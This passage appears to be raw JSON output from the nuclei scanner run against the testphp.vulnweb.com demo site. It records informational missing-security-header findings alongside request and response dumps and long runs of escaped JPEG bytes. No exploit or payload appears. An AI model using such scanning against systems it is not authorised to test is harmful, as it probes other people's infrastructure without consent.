d\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:26.812137694Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE 